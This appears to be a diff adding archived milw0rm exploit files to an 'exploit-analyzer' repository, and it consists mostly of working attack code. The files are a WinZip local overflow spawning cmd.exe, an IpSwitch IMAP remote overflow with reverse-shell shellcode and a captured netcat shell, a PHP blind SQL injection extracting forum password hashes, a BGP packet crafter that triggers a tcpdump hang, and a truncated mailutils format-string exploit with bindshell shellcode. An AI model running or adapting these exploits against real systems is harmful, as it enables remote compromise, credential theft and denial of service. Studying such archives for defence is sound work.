
exploit-analyzer/exploits/exploit_1034.txt ADDED Viewed

	@@ -0,0 +1,82 @@

+/*
+*
+* WinZip Command Line Local Buffer Overflow
+* http://securitytracker.com/alerts/2004/Sep/1011132.html
+* http://www.winzip.com/wz90sr1.htm
+* Exploit coded By ATmaCA
+* Web: atmacasoft.com && spyinstructors.com
+* E-Mail: atmaca@icqmail.com
+* Credit to kozan
+*
+*/
+/*
+*
+* Tested with WinZip 8.1 on Win XP Sp2 En
+* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
+* http://www.winzip.com/wz90sr1.htm
+*
+*/
+#include <windows.h>
+#include <stdio.h>
+#define NOP 0x90
+void main()
+{
+        // create crafted command line
+        char tmpfile[] = "c:\\wzs45.tmp";
+        char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
+        char zipandmailpar[] = " -* /zipandmail /@  ";
+        char runpar[300];
+        int i = 0;
+        strcpy(runpar,winzippath);
+        strcat(runpar,zipandmailpar);
+        strcat(runpar,tmpfile);
+        // need for some input file name .tmp but not must to exist
+        char inputfile[] = "C:\\someinputfile.ext\n";
+        // launch a local cmd.exe
+        char shellcode[] =
+        "\x55\x8B\xEC\x33\xFF"
+        "\x57\x83\xEC\x04\xC6\x45\xF8"
+        "\x63\xC6\x45\xF9\x6D\xC6\x45"
+        "\xFA\x64\xC6\x45\xFB\x2E\xC6"
+        "\x45\xFC\x65\xC6\x45\xFD\x78"
+        "\xC6\x45\xFE\x65\xB8"
+        "\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
+        "\x50\x8D\x45\xF8\x50"
+        "\xFF\x55\xF4";
+        // create crafted .tmp file
+        FILE *di;
+        if( (di=fopen(tmpfile,"wb")) == NULL ){
+                return;
+        }
+        for(i=0;i<sizeof(inputfile)-1;i++)
+                fputc(inputfile[i],di);
+        fprintf(di,"c:\\");
+        for(i=0;i<384;i++)
+                fputc(NOP,di);
+        for(i=0;i<sizeof(shellcode)-1;i++)
+                fputc(shellcode[i],di);
+        fprintf(di,"\xBF\xAC\xDA\x77");  //EIP - WinXp Sp2 Eng - jmp esp addr
+        fprintf(di,"\x90\x90\x90\x90");  //NOPs
+        fprintf(di,"\x90\x83\xEC\x74");  //sub esp,0x74
+        fprintf(di,"\xFF\xE4\x90\x90");  //jmp esp
+        fprintf(di,"\n");
+        fclose(di);
+        WinExec(runpar,SW_SHOW);
+}
+// milw0rm.com [2005-06-07]

exploit-analyzer/exploits/exploit_1035.txt ADDED Viewed

	@@ -0,0 +1,290 @@

+/*
+IpSwitch IMAP Server LOGON stack overflow.
+Software Hole discovered by iDEFENSE
+POC written by nolimit and BuzzDee
+First, some information for the few of you that know how this stuff works.
+The reason you see no SP2 or 2003 offsets is because of Windows SEH checks.
+Thats right, in this one situation, They've stopped hackers from exploiting the machine.
+At least with as much research as I care to do. The problem lies in the
+fact that only alpha numeric memory addresses can be used in this exploit.
+So what lies within the few regions of memory that is alpha numeric safe? Only system
+DLLs.(Well also a 7000 byte TEB block section, which doesn't really produce much either).
+So any SEH address overwritten that points to a system DLL  will fail past Windows XP SP2.
+From what I've read and the few tricks I've tried, Theirs no way currently to get around the
+protection In my situation.
+For the sharp ones, you've maybe noticed that XP SP1 isn't an offset. This is because
+of two reasons, While I've developed along with skylined an alpha numeric shellcode
+to handle the stack protections in Windows XP/2K3, I don't think he's ready to release
+it yet.So, when It does come around, you can use that and re-adjust the stack accordingly
+for proper exploitation of SP1.
+The size we have on the stack is too small for a bindshell, but big enough for a reverse shell!
+So I use ALPHA2's decoder and encoder (modified) to write info to reverse shell, then encode it.
+visit http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php for more information.
+Now, for the "impact assessment".
+Because this doesn't work on SP2 / 2003, the 53 million users that use Imail should
+mostly be safe from complete ownage. But, Do not let this fact let you not patch your
+server! This exploit, sent with any offset, will still crash your IMAP server!
+With that said, Thier is still a small amount of servers online that run one of these
+targetted offsets, and therefore can be exploited. I hope this Proof Of Concept is the
+push administrators need to patch their software.
+For Da Skiddies: this exploit is teh oww kay. I g0t a f3w shells0rs.
+  C:\HACKING\tools>nc -vv -l -p 3333
+	listening on [any] 3333 ...
+	DNS fwd/rev mismatch: 2kvm != 2kvm.launchmodem.com
+	connect to [192.168.1.95] from 2kvm [192.168.1.93] 1078
+	Microsoft Windows 2000 [Version 5.00.2195]
+	(C) Copyright 1985-2000 Microsoft Corp.
+	C:\WINNT\system32>_
+Questions? Comments?
+  nolimit@coreiso.org
+                             -  - ---.
+             .----------------------. |                      ·
+             | :::::::::''''':::::: | !                   · /
+             l  '''''           '': | `                  /_/
+     .--- --·X·----------- -- -  -  | - c o r e i s o   __ \  ·   -  - ---.
+     |       !                      :                  /_/\ \/            |
+             |                                        _\ \ \              |
+  S! /\____  |  _ ______/\ __ ______/\ __ ______/\   / /\_\/ _______ /\______
+   _/    _/_____\    _    \__    _    \__    _    \_/ /  \ _/  ____//   _    \_
+  //    /     _      /     /    _/     /     /     / /   / \_____      |/     /
+_/     /      /     /    _/     \    _/\    ______/\/   /:     |/      /     /|
+\ ___________/\ _________\ _____|\______\ __________\  /||     _______________|
+ \/  .       . \/         \/        .    \/     /_/   / |______\          .
+     |       |                      .          _\ \  /                    |
+     |       |                      l         /_/\_\/                     |
+     `------ | ------- -- -   - ---·X·-- -  -_\ \ \       -   -  - -- ----'
+           . | :.            .....  !.      / /\_\/
+           : | :::::......::::::::: |:     / /. \
+           | `----------------------'|    /_//  /    www.coreiso.org
+           `--- -  -                 |    \ \  /     Innovation, not imitation.
+                             -  - ---'     \_\/
+*/
+#include <stdio.h>
+#include <string.h>
+#include <winsock.h>
+#pragma comment(lib,"ws2_32")
+void cmdshell (int sock);
+long gimmeip(char *hostname);
+char buffer[2500];
+//special stuff
+char* alphaEncodeShellcode(char *shellcode, int size);
+// un-crypted shellcode that we'll fill our retn values, then encode.
+char unEncShellcode[]=
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
+//160 above, ip next 4 bytes then, pass 2 theres port
+"\x64\x64\x64\x64\x66\x68\x0d\x05\x66\x53\x89\xe1\x95\x68\xec\xf9"
+"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
+"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
+"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
+"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
+"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
+"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
+"\xff\x77\xfc\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
+//modified encoded alpha num SUB ECX, 2E8 JMP ECX
+char jmpBack[]=
+"VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
+"IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIoqYyKHTB30WpyoKQAPA";
+int paddingSize; // change when changing shellcode. 676 bytes - shellcodesize = this.
+char jmp2KSP4[] = "\x40\x43\x44\x78"; //JMP EBX 2000 SP4 TESTED
+char jmp2KSP3[] = "\x40\x23\x44\x78"; //JMP EBX 2000 SP3
+char jmp2KSP2[] = "\x40\x21\x46\x78"; //JMP EBX 2000 SP2
+char jmp2KSP1[] = "\x62\x54\x30\x77"; //POP POP RETN 2000 SP1 (no jmp ebx)
+char jmp2KSP0[] = "\x6C\x30\x6B\x77"; //JMP EBX 2000 SP0
+char jmpXPSP0[] = "\x63\x4F\x60\x77"; //JMP EBX WinXP SP0 no SEH XOR prot so JMP EBX is ok
+int main(int argc,char *argv[])
+{
+		WSADATA wsaData;
+		struct sockaddr_in targetTCP;
+		int sockTCP;
+		unsigned short port = 143;
+		long ip;
+		if(argc < 5)
+		{
+			printf("IpSwitch IMAP server Remote Stack Overflow.\n"
+				"This exploit uses a reverse shell payload.\n"
+				"Usage: %s [retnaddr] [retport] [target] [address] <port_to_exploit>\n"
+				" eg: %s 192.168.1.94 1564 2 192.168.1.95\n"
+				"Targets:\n"
+				"1. Windows XP SP 0.\n2. Windows 2000 SP4\n3. Windows 2000 SP3\n"
+				"4. Windows 2000 SP2\n5. Windows 2000 SP1\n6. Windows 2000 SP0\n"
+				"Read comments in source code for more info.\n"
+				"Coded by nolimit@CiSO and BuzzDee.\n",argv[0],argv[0]);
+			return 1;
+		}
+		if(argc==6)
+			port = atoi(argv[5]);
+        	WSAStartup(0x0202, &wsaData);
+		printf("[*] Target:\t%s \tPort: %d\n\n",argv[4],port);
+		ip=gimmeip(argv[4]);
+        	targetTCP.sin_family = AF_INET;
+        	targetTCP.sin_addr.s_addr = ip;
+        	targetTCP.sin_port = htons(port);
+		//set ip/port specified. Probably could have done this easier, but whatever.
+		unsigned long revIp = gimmeip(argv[1]);
+		unsigned long *revPtr = (unsigned long *)&unEncShellcode;
+		revPtr = revPtr + (160/4); //go to ip place, it adds by 4, and it's 160 bytes away.
+		*revPtr = revIp;
+		char *portPtr = (char *)revPtr + 6; //ptr + 2 bytes past
+		int rPort = atoi(argv[2]);
+		char *revPortPtr = (char *)&rPort;
+		memcpy(portPtr,revPortPtr+1,1);
+		memcpy(portPtr+1,revPortPtr,1);
+		//done formatting, now lets encode it.
+		char *shellcode = alphaEncodeShellcode(unEncShellcode,sizeof(unEncShellcode));
+		paddingSize = 676 - strlen(shellcode);
+		//form buffer here.
+		memset(buffer,'\x00',2500);
+		strcpy(buffer,"A001 LOGIN user@");
+		memset(buffer+16,'\x41',paddingSize); //INC ECX nopslide
+		strcat(buffer,shellcode);
+		strcat(buffer,"r!s!"); //jmp over SE handler
+		switch(atoi(argv[3]))
+		{
+			case 1:
+			printf("[*] Targetting Windows XP SP 0..\n");
+			strcat(buffer,jmpXPSP0);
+			break;
+			case 2:
+			printf("[*] Targetting Windows 2000 SP4..\n");
+			strcat(buffer,jmp2KSP4);
+			break;
+			case 3:
+			printf("[*] Targetting Windows 2000 SP3..\n");
+			strcat(buffer,jmp2KSP3);
+			break;
+			case 4:
+			printf("[*] Targetting Windows 2000 SP2..\n");
+			strcat(buffer,jmp2KSP2);
+			break;
+			case 5:
+			printf("[*] Targetting Windows 2000 SP1..\n");
+			strcat(buffer,jmp2KSP1);
+			break;
+			case 6:
+			printf("[*] Targetting Windows 2000 SP0..\n");
+			strcat(buffer,jmp2KSP0);
+			break;
+			default:
+			printf("Target error.\n");
+			return 1;
+			break;
+		}
+		memset(buffer+strlen(buffer),'\x41',29);
+		strcat(buffer,jmpBack); //decodes to jmp back to top part of buffer
+		memset(buffer+strlen(buffer),'\x41',1323);
+		strcat(buffer," nolimits\r\n");
+		//buffer formed
+		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
+		{
+				printf("[x] Socket not initialized! Exiting...\n");
+				WSACleanup();
+                return 1;
+		}
+		printf("[*] Socket initialized...\n");
+		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
+		{
+			printf("[*] Connection to host failed! Exiting...\n");
+			WSACleanup();
+			exit(1);
+		}
+		printf("[*] Sending  buffer.\n");
+		Sleep(1000);
+		if (send(sockTCP, buffer, strlen(buffer),0) == -1)
+		{
+				printf("[x] Failed to inject packet! Exiting...\n");
+				WSACleanup();
+                return 1;
+		}
+		Sleep(1000);
+		closesocket(sockTCP);
+		WSACleanup();
+		printf("Exploit sent. Reverse Shell should be comming if everyhing worked.\n");
+		return 0;
+}
+/*********************************************************************************/
+long gimmeip(char *hostname)
+{
+	struct hostent *he;
+	long ipaddr;
+	if ((ipaddr = inet_addr(hostname)) < 0)
+	{
+		if ((he = gethostbyname(hostname)) == NULL)
+		{
+			printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
+			WSACleanup();
+			exit(1);
+		}
+		memcpy(&ipaddr, he->h_addr, he->h_length);
+	}
+	return ipaddr;
+}
+/*********************************************************************************/
+//Below here, all code is modified code from ALPHA 2: Zero-tolerance by Berend-Jan Wever.
+//  aka Skylined  <skylined@edup.tudelft.nl>. Hats off to him.
+//ecx ascii decoder.
+#define ecx_mixedcase_ascii_decoder	"IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
+// shellcode ptr & size
+char* alphaEncodeShellcode(char *shellcode, int size)
+{
+	int   i, input, A, B, C, D, E, F;
+	char* valid_chars="0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
+	//first, create a big enough shellcode memory section
+	char *encShellcode = (char *) malloc(sizeof((ecx_mixedcase_ascii_decoder) + (size * 2)));
+	strcpy(encShellcode,ecx_mixedcase_ascii_decoder);
+	char buff[4];
+	int z=0;
+	for(;z < size;z++)
+	{
+		 // encoding AB -> CD 00 EF 00
+		A = (shellcode[z] & 0xf0) >> 4;
+		B = (shellcode[z] & 0x0f);
+		F = B;
+		// E is arbitrary as long as EF is a valid character
+		i = rand() % strlen(valid_chars);
+		while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
+		E = valid_chars[i] >> 4;
+		// normal code uses xor, unicode-proof uses ADD.
+		// AB ->
+		D =  0 ? (A-E) & 0x0f : (A^E);
+		// C is arbitrary as long as CD is a valid character
+		i = rand() % strlen(valid_chars);
+		while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
+		C = valid_chars[i] >> 4;
+		//edit, use curChar ptr to strncpy it.
+		//printf("%c%c", (C<<4)+D, (E<<4)+F);
+		sprintf(buff,"%c%c",(C<<4)+D, (E<<4)+F);
+		strcat(encShellcode,buff);
+	}
+	return encShellcode;
+}
+// milw0rm.com [2005-06-07]

exploit-analyzer/exploits/exploit_1036.txt ADDED Viewed

	@@ -0,0 +1,79 @@

+<?php
+/*
+<= 1.3.1 Final
+/str0ke
+*/
+$server = "SERVER";
+$port = 80;
+$file = "PATH";
+$target = 81;
+/* User id and password used to fake-logon are not important. '10' is a
+random number. */
+$id = 10;
+$pass = "";
+$hex = "0123456789abcdef";
+for($i = 1; $i <= 32; $i++ ) {
+        $idx = 0;
+        $found = false;
+        while( !($found) ) {
+                $letter = substr($hex, $idx, 1);
+                /* %2527 translates to %27, which gets past magic quotes.
+This is translated to ' by urldecode. */
+                $cookie =
+"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
+                $cookie .=
+"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
+                /* Query is in effect: SELECT * FROM ibf_members
+                                       WHERE id=$id AND password='$pass' OR
+id=$target
+                                       HAVING id=$target AND
+MID(`password`,$i,1)='$letter' */
+                $header = getHeader($server, $port, $file .
+"index.php?act=Login&CODE=autologin", $cookie);
+                if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
+$header) ) {
+                        echo $i . ": " . $letter . "\n";
+                        $found = true;
+                        $hash .= $letter;
+                } else {
+                        $idx++;
+                }
+        }
+}
+echo "\n\nFinal Hash: $hash\n";
+function getHeader($server, $port, $file, $cookie) {
+        $ip = gethostbyname($server);
+        $fp = fsockopen($ip, $port);
+        if (!$fp) {
+                return "Unknown";
+        } else {
+                $com = "HEAD $file HTTP/1.1\r\n";
+                $com .= "Host: $server:$port\r\n";
+                $com .= "Cookie: $cookie\r\n";
+                $com .= "Connection: close\r\n";
+                $com .= "\r\n";
+                fputs($fp, $com);
+                do {
+                        $header.= fread($fp, 512);
+                } while( !preg_match('/\r\n\r\n$/',$header) );
+        }
+        return $header;
+}
+?>
+// milw0rm.com [2005-06-08]

exploit-analyzer/exploits/exploit_1037.txt ADDED Viewed

	@@ -0,0 +1,360 @@

+/*
+* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite
+* loop vulnerability.
+*
+* libnet 1.1
+* Build a BGP4 update message with what you want as payload
+*
+* Copyright (c) 2003 Fr d ric Raynal <pappy at security-labs organization>
+* All rights reserved.
+*
+* Examples:
+*
+* empty BGP UPDATE message:
+*
+* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
+* libnet 1.1 packet shaping: BGP4 update + payload[raw]
+* Wrote 63 byte TCP packet; check the wire.
+*
+* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
+* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
+* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....
+* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
+* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
+* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............
+*
+*
+* BGP UPDATE with Path Attributes and Unfeasible Routes Length
+*
+* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W 13
+* libnet 1.1 packet shaping: BGP4 update + payload[raw]
+* Wrote 79 byte TCP packet; check the wire.
+*
+* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
+* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)
+* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....
+* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
+* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............
+* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA
+* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....
+*
+*
+* BGP UPDATE with Reachability Information
+*
+* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7
+* libnet 1.1 packet shaping: BGP4 update + payload[raw]
+* Wrote 70 byte TCP packet; check the wire.
+*
+* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
+* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)
+* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....
+* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
+* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........
+* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C
+* 0x0040 4343 4343 4343 CCCCCC
+*
+*
+* Redistribution and use in source and binary forms, with or without
+* modification, are permitted provided that the following conditions
+* are met:
+* 1. Redistributions of source code must retain the above copyright
+* notice, this list of conditions and the following disclaimer.
+* 2. Redistributions in binary form must reproduce the above copyright
+* notice, this list of conditions and the following disclaimer in the
+* documentation and/or other materials provided with the distribution.
+*
+* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+* SUCH DAMAGE.
+*
+*/
+/* #if (HAVE_CONFIG_H) */
+/* #include "../include/config.h" */
+/* #endif */
+/* #include "./libnet_test.h" */
+#include <libnet.h>
+void
+usage(char *name);
+#define set_ptr_and_size(ptr, size, val, flag) \
+if (size && !ptr) \
+{ \
+ptr = (u_char *)malloc(size); \
+if (!ptr) \
+{ \
+printf("memory allocation failed (%u bytes requested)\n", size); \
+goto bad; \
+} \
+memset(ptr, val, size); \
+flag = 1; \
+} \
+\
+if (ptr && !size) \
+{ \
+size = strlen(ptr); \
+}
+int
+main(int argc, char *argv[])
+{
+int c;
+libnet_t *l;
+u_long src_ip, dst_ip, length;
+libnet_ptag_t t = 0;
+char errbuf[LIBNET_ERRBUF_SIZE];
+int pp;
+u_char *payload = NULL;
+u_long payload_s = 0;
+u_char marker[LIBNET_BGP4_MARKER_SIZE];
+u_short u_rt_l = 0;
+u_char *withdraw_rt = NULL;
+char flag_w = 0;
+u_short attr_l = 0;
+u_char *attr = NULL;
+char flag_a = 0;
+u_short info_l = 0;
+u_char *info = NULL;
+char flag_i = 0;
+printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n");
+/*
+* Initialize the library. Root priviledges are required.
+*/
+l = libnet_init(
+LIBNET_RAW4, /* injection type */
+NULL, /* network interface */
+errbuf); /* error buffer */
+if (l == NULL)
+{
+fprintf(stderr, "libnet_init() failed: %s", errbuf);
+exit(EXIT_FAILURE);
+}
+src_ip = 0;
+dst_ip = 0;
+memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
+memset(marker, 0xff, LIBNET_BGP4_MARKER_SIZE);
+while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF)
+{
+switch (c)
+{
+/*
+* We expect the input to be of the form `ip.ip.ip.ip.port`. We
+* point cp to the last dot of the IP address/port string and
+* then seperate them with a NULL byte. The optarg now points to
+* just the IP address, and cp points to the port.
+*/
+case 'd':
+if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
+{
+fprintf(stderr, "Bad destination IP address: %s\n", optarg);
+exit(EXIT_FAILURE);
+}
+break;
+case 's':
+if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
+{
+fprintf(stderr, "Bad source IP address: %s\n", optarg);
+exit(EXIT_FAILURE);
+}
+break;
+case 'p':
+payload = optarg;
+payload_s = strlen(payload);
+break;
+case 'w':
+withdraw_rt = optarg;
+break;
+case 'W':
+u_rt_l = atoi(optarg);
+break;
+case 'a':
+attr = optarg;
+break;
+case 'A':
+attr_l = atoi(optarg);
+break;
+case 'i':
+info = optarg;
+break;
+case 'I':
+info_l = atoi(optarg);
+break;
+default:
+exit(EXIT_FAILURE);
+}
+}
+if (!src_ip || !dst_ip)
+{
+usage(argv[0]);
+goto bad;
+}
+set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);
+set_ptr_and_size(attr, attr_l, 0x42, flag_a);
+set_ptr_and_size(info, info_l, 0x43, flag_i);
+/*
+* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump
+* infinite loop vulnerability.
+*/
+if (payload == NULL) {
+if ((payload = malloc(16)) == NULL) {
+fprintf(stderr, "Out of memory\n");
+exit(1);
+}
+pp = 0;
+payload[pp++] = 0;
+payload[pp++] = 33;
+payload_s = pp;
+}
+/*
+* BGP4 update messages are "dynamic" are fields have variable size. The only
+* sizes we know are those for the 2 first fields ... so we need to count them
+* plus their value.
+*/
+length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;
+t = libnet_build_bgp4_update(
+u_rt_l, /* Unfeasible Routes Length */
+withdraw_rt, /* Withdrawn Routes */
+attr_l, /* Total Path Attribute Length */
+attr, /* Path Attributes */
+info_l, /* Network Layer Reachability Information length */
+info, /* Network Layer Reachability Information */
+payload, /* payload */
+payload_s, /* payload size */
+l, /* libnet handle */
+0); /* libnet id */
+if (t == -1)
+{
+fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l));
+goto bad;
+}
+length+=LIBNET_BGP4_HEADER_H;
+t = libnet_build_bgp4_header(
+marker, /* marker */
+length, /* length */
+LIBNET_BGP4_UPDATE, /* message type */
+NULL, /* payload */
+0, /* payload size */
+l, /* libnet handle */
+0); /* libnet id */
+if (t == -1)
+{
+fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
+goto bad;
+}
+length+=LIBNET_TCP_H;
+t = libnet_build_tcp(
+0x6666, /* source port */
+179, /* destination port */
+0x01010101, /* sequence number */
+0x02020202, /* acknowledgement num */
+TH_SYN, /* control flags */
+32767, /* window size */
+0, /* checksum */
+0, /* urgent pointer */
+length, /* TCP packet size */
+NULL, /* payload */
+0, /* payload size */
+l, /* libnet handle */
+0); /* libnet id */
+if (t == -1)
+{
+fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
+goto bad;
+}
+length+=LIBNET_IPV4_H;
+t = libnet_build_ipv4(
+length, /* length */
+0, /* TOS */
+242, /* IP ID */
+0, /* IP Frag */
+64, /* TTL */
+IPPROTO_TCP, /* protocol */
+0, /* checksum */
+src_ip, /* source IP */
+dst_ip, /* destination IP */
+NULL, /* payload */
+0, /* payload size */
+l, /* libnet handle */
+0); /* libnet id */
+if (t == -1)
+{
+fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
+goto bad;
+}
+/*
+* Write it to the wire.
+*/
+c = libnet_write(l);
+if (c == -1)
+{
+fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
+goto bad;
+}
+else
+{
+fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
+}
+if (flag_w) free(withdraw_rt);
+if (flag_a) free(attr);
+if (flag_i) free(info);
+libnet_destroy(l);
+return (EXIT_SUCCESS);
+bad:
+if (flag_w) free(withdraw_rt);
+if (flag_a) free(attr);
+if (flag_i) free(info);
+libnet_destroy(l);
+return (EXIT_FAILURE);
+}
+void
+usage(char *name)
+{
+fprintf(stderr,
+"usage: %s -s source_ip -d destination_ip \n"
+" [-m marker] [-p payload] [-S payload size]\n"
+" [-w Withdrawn Routes] [-W Unfeasible Routes Length]\n"
+" [-a Path Attributes] [-A Attribute Length]\n"
+" [-i Reachability Information] [-I Reachability Information length]\n",
+name);
+}
+// milw0rm.com [2005-06-09]

exploit-analyzer/exploits/exploit_1038.txt ADDED Viewed

	@@ -0,0 +1,297 @@

+/*
+   gun-imapd.c
+   """""""""""
+   gnu mailutils-0.5 - < mailutils-0.6.90 remote formatstring exploit
+   written and tested on FC3.
+   this is a first testing version and the onlyone to go public.
+   by
+      qobaiashi@u-n-f.com
+*/
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+// to be modified
+#define  GOT  0x080573fc
+static char bindshell[]= //by pr1 bind to :4096
+"\x31\xc0"              //  xor    %eax,%eax
+"\x50"                  //  push  %eax
+"\x40"                  //  inc    %eax
+"\x89\xc3"              //  mov    %eax,%ebx
+"\x40"                  //  inc    %eax
+"\x53"                  //  push  %ebx
+"\x50"                          //  push  %eax
+"\x89\xe1"                      //  mov    %esp,%ecx
+"\xb0\x66"                      //  mov    $0x66,%al
+"\xcd\x80"              //  int    $0x80
+"\x31\xd2"              //  xor    %edx,%edx
+"\x52"                  //  push  %edx
+"\x43"                  //  inc    %ebx
+"\x6a\x10"              //  push  $0x10
+"\x66\x53"              //  push  %bx
+"\x89\xe1"                      //  mov    %esp,%ecx
+"\x6a\x10"              //  push  $0x10
+"\x51"                  //  push  %ecx
+"\x50"                  //  push  %eax
+"\x89\xe1"              //  mov    %esp,%ecx
+"\xb0\x66"                      //  mov    $0x66,%al
+"\xcd\x80"              //  int    $0x80
+"\xd1\xe3"              //  shl    %ebx
+"\xb0\x66"              //  mov    $0x66,%al
+"\xcd\x80"              //  int    $0x80
+"\x58"                  //  pop    %eax
+"\x52"                          //  push  %edx
+"\x50"                          //  push  %eax
+"\x43"                          //  inc    %ebx
+"\x89\xe1"              //  mov    %esp,%ecx
+"\xb0\x66"              //  mov    $0x66,%al
+"\xcd\x80"              //  int    $0x80
+"\x87\xd9"                      //  xchg  %ebx,%ecx
+"\x93"                          //  xchg  %eax,%ebx
+"\x49"                          //  dec    %ecx
+"\x31\xc0"                      //  xor    %eax,%eax
+"\x49"                          //  dec    %ecx
+"\xb0\x3f"                      //  mov    $0x3f,%al
+"\xcd\x80"                      //  int    $0x80
